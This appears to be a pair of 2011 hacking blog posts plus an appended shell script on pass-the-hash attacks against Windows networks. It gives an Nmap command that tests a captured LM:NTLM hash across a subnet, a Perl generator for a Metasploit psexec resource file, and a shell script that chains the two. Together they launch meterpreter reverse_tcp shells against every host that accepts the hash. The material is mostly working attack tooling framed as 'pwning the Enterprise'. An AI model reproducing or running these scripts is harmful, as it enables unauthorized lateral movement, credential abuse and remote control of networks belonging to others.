Friday, October 7, 2011

NMap & Pass-the-Hash

Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets, working through the entire range/list takes time: for every host where the hash is wrong you wait for the authentication to fail, for the module to time out, and then for the 2-second sleep. There has to be a better way, and there is: find out where the hash works before psexec ever touches a host.

Nmap's SMB scripts accept an LM:NTLM hash in place of a password, so a single scan shows which hosts accept the hash (the hash below is the LM:NTLM pair for the well-known test password, not a real credential):

nmap -n -sT -p445 --script=smb-enum-shares.nse --script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN -oN SMB-User.txt 10.110.10.1/24 --open -vv

HINT: To try the hash as a local account instead of a domain account, use "smbdomain=." (a lone dot).

For further information, see the documentation for Nmap's smbauth library, which defines the smbuser, smbhash, smbdomain and smbtype script arguments (look at smbtype in particular: v1 sends LMv1 and NTLMv1, v2 sends LMv2 and NTLMv2).

Tuesday, October 4, 2011

A Faster psexec Attack

So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up with a solution."

I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range, but I updated it to read the RHOST values from a file instead. That way, once I get a hash I want to try, I can nmap the environment and collect only the hosts with SMB open as targets for the attack.

Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt

Then write the perl script that generates the MSF resource file. Redirect its output to a file and load that with msfconsole -r.
----------------------------------------------------------------------
#!/usr/bin/perl -w
use strict;

# Target list: one IP per line, as produced by the nmap/cut pipeline above.
my $input_file = "smb.txt";

# Module setup is printed once. NAME, HASH and XXX.XXX.XXX.XXX are placeholders;
# HASH is the LM:NTLM pair, the same form nmap's smbhash argument takes.
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";

# One psexec attempt per host; the sleep gives the handler a moment to
# settle before the next run.
open(my $in, '<', $input_file) or die "Cannot open $input_file: $!\n";
while (my $ip = <$in>) {
    chomp $ip;
    next if $ip =~ /^\s*$/;    # skip blank lines
    print "set RHOST $ip\n";
    print "exploit\n";
    print "sleep 2\n";
}
close($in);
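Putting the two posts together, here is an added example of mine (not from either post) that turns the nmap pass-the-hash scan into a target list and then into the psexec resource file, so psexec only gets pointed at hosts where the hash already authenticated. It keys on the account_used line that smb-enum-shares prints once it has logged in; the nmap output embedded below is a constructed sample, not a real scan, and the function names, the LHOST address and the target addresses are mine. The resource file it emits uses the same plain exploit plus sleep 2 sequence as the perl script.

```shell
#!/bin/sh
# Added example, not from the original posts: feed the nmap pass-the-hash
# scan into the psexec resource-file generator, keeping only hosts where the
# hash actually authenticated. Function names and the sample below are mine.

# Constructed sample of what nmap -oN writes for the smb-enum-shares scan
# (not a real scan). .5 and dc01 (.12) accepted the hash and listed shares;
# .9 rejected it, so the script reports an error and no account_used line.
SAMPLE_NMAP_OUTPUT='Nmap scan report for 10.110.10.5
Host is up (0.0010s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: USER
|   \\10.110.10.5\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|_    Current user access: READ/WRITE

Nmap scan report for 10.110.10.9
Host is up (0.0020s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-enum-shares: ERROR: Script execution failed (use -d to debug)

Nmap scan report for dc01.corp.local (10.110.10.12)
Host is up (0.0015s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: USER
|   \\10.110.10.12\SYSVOL:
|     Type: STYPE_DISKTREE
|_    Current user access: READ'

# pth_hits: read nmap -oN output on stdin and print one IP per line for every
# host whose smb-enum-shares result carries an account_used line, i.e. where
# the supplied hash was accepted. Hosts that failed to authenticate are dropped.
pth_hits() {
    awk '
        /^Nmap scan report for / {
            host = $5
            # "Nmap scan report for name (ip)" form: take the IP in parentheses
            if ($6 ~ /^\(/) host = substr($6, 2, length($6) - 2)
        }
        /account_used:/ && host != "" { print host; host = "" }
    '
}

# gen_psexec_rc USER LM:NTLM DOMAIN LHOST: read target IPs on stdin and emit
# the same resource file the perl script builds, one psexec attempt per host.
gen_psexec_rc() {
    user=$1; hash=$2; domain=$3; lhost=$4
    printf 'use windows/smb/psexec\n'
    printf 'set SMBUser %s\n' "$user"
    printf 'set SMBPass %s\n' "$hash"      # LM:NTLM, as on the nmap command line
    printf 'set SMBDomain %s\n' "$domain"  # "." for a local account
    printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT 4444\n'
    while read -r ip; do
        [ -n "$ip" ] || continue
        printf 'set RHOST %s\n' "$ip"
        printf 'exploit\n'
        printf 'sleep 2\n'
    done
}

# Usage: sh pth-targets.sh SMB-User.txt USER LM:NTLM DOMAIN LHOST > psexec.rc
# then: msfconsole -r psexec.rc. With no arguments it runs on the sample above.
if [ $# -ge 5 ]; then
    pth_hits < "$1" | gen_psexec_rc "$2" "$3" "$4" "$5"
else
    printf '%s\n' "$SAMPLE_NMAP_OUTPUT" \
        | pth_hits \
        | gen_psexec_rc USER \
            e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c \
            DOMAIN 10.110.10.200
fi
```

Run the nmap command from the first post with -oN SMB-User.txt, then sh pth-targets.sh SMB-User.txt USER LM:NTLM DOMAIN LHOST > psexec.rc and msfconsole -r psexec.rc. Hosts that rejected the hash never reach psexec, so there is no waiting on failed logins, module timeouts or sleeps for them; only the hosts in the resource file get an attempt.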